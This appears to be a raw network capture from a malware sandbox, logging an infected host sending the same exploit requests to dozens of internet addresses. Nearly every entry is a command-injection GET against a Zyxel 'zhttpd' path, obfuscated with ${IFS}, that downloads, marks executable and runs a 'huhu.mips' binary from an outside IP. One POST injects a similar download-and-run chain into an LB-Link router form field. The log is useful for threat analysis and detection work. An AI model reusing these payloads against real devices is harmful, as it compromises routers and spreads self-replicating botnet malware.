                                      Jan 19, 2024 17:29:48.096287966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8318192.168.2.144057096.27.31.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096311092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8319192.168.2.1447844196.62.174.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096337080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8320192.168.2.1441056132.69.213.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096379042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8321192.168.2.145752460.50.161.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096426010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8322192.168.2.145892049.137.147.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096462965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8323192.168.2.1449030198.222.180.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096507072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8324192.168.2.1453024165.26.165.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096565008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8325192.168.2.1454010124.73.65.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096609116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8326192.168.2.1450040100.133.167.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096635103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8327192.168.2.143304438.174.27.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096658945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8328192.168.2.145305638.196.133.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096702099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8329192.168.2.145503453.137.196.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096759081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8330192.168.2.1434984205.199.3.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096787930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8331192.168.2.143425635.155.192.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.099982977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8332192.168.2.143366480.48.185.1648080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.033766985 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:49.283824921 CET516INHTTP/1.1 400 Bad Request
                                      Content-Type: text/html
                                      Content-Length: 349
                                      Connection: close
                                      Date: Wed, 27 May 2020 20:18:06 GMT
                                      Server: lighttpd/1.4.39
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8333192.168.2.1442028160.55.179.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107186079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8334192.168.2.145448495.246.233.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107228994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8335192.168.2.1441360141.99.7.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107280970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8336192.168.2.144720218.70.137.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107350111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8337192.168.2.1455772148.140.248.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107367039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8338192.168.2.144610487.112.57.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107428074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8339192.168.2.144286867.56.92.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107454062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8340192.168.2.1434138113.44.240.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107461929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8341192.168.2.1444116165.5.25.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107508898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8342192.168.2.1457376222.14.223.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107525110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8343192.168.2.1448252147.152.157.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107599974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8344192.168.2.144344646.235.22.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107630014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8345192.168.2.144693817.148.214.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107691050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8346192.168.2.143762095.45.250.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107711077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8347192.168.2.1456890143.179.52.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107726097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8348192.168.2.1455354101.64.28.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107779026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8349192.168.2.143516251.163.152.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107805967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8350192.168.2.143603882.192.25.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107837915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8351192.168.2.1439188112.114.116.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107880116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8352192.168.2.1454286112.77.61.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107902050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8353192.168.2.1433550220.97.146.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.107969999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8354192.168.2.1450566143.229.104.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108026981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8355192.168.2.1450374133.92.64.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108098984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8356192.168.2.1456598190.65.170.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108110905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8357192.168.2.1433370187.144.246.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108141899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8358192.168.2.1445566132.87.253.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108206034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8359192.168.2.145306477.200.250.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108257055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8360192.168.2.1442840125.166.212.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108294964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8361192.168.2.143626259.93.191.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108334064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8362192.168.2.146037059.32.132.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108398914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8363192.168.2.144810883.71.79.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108423948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8364192.168.2.143390219.70.177.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108500957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8365192.168.2.1436776153.40.5.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108511925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8366192.168.2.144016475.196.226.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108572006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8367192.168.2.145558631.9.252.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108633995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8368192.168.2.1445808217.116.213.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108645916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8369192.168.2.144380019.159.206.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108673096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8370192.168.2.143586477.81.219.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108692884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8371192.168.2.1459678135.81.40.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108726025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8372192.168.2.146061463.190.109.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108758926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8373192.168.2.1442382112.117.231.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108824968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8374192.168.2.1458226131.10.213.32443
                                      TimestampBytes transferredDirectionData
